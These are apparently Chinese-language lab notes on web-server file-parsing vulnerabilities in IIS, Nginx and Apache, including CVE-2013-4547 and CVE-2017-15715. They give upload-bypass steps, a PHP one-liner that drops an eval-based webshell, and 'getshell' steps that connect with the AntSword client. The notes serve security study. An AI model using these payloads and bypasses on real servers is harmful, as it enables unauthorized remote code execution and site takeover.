1.IIS解析漏洞
(1)IIS6.x目录解析:
.asp/1.txt无论什么文件都被解析为asp文件
(2)畸形文件解析
分号可以起到截断作用,也就是说 2.asp;.jpg会被服务器看成是2.asp。
2.IIS7.x
(1)利用姿势
在小p中www目录下创建1.jpg里面写phpinfo,后面加/.php可以访问到
Getshell 一句话木马
同上,蚁剑连接成功
3.Niginx解析漏洞
(1)nginx_parsing
Nginx的文件解析漏洞和IS7.0的解析漏洞同样的原理,因为 cgi.fix_pathinfo=1 造成的解析漏洞,同样使用 1.jpg/.php 方式进行绕过
上传jpg
后面加/.php
get型可以进行cmd赋值
(2)CVE-2013-4547
此漏洞为文件名逻辑漏洞,修改其16进制编码可使其绕过策略,导致解析为php。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。
1)准备phpinfo的文件
<?php fputs(fopen('zzy.php','w'),'<?php @eval($_POST["cmd"])?>');?>
2)上传并抓包
3)后面添加两个空格加.php
4)hex中将第二个空格改为00,再发送
5)访问路径/uploadfiles/2.txt加两个空格.php再进行抓包
6)将%20都改成空格,hax中第二个再改成00
7)发现可以访问
直接访问创建好的zzy.php,蚁剑连接
4.Apache解析漏洞
(1)apache_parsing
在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析就再往左判断。如 1.php.xxxxX,后面是什么都解析为php
(2)CVE-2017-15715
Apache HTTPD是一款HTTP服务器,它可以通过mod php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php%OA将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
上传,并抓包在evil.php文件后面添加空格0x20在改为 0x0a 再次返送即可上传成功。
连接蚁剑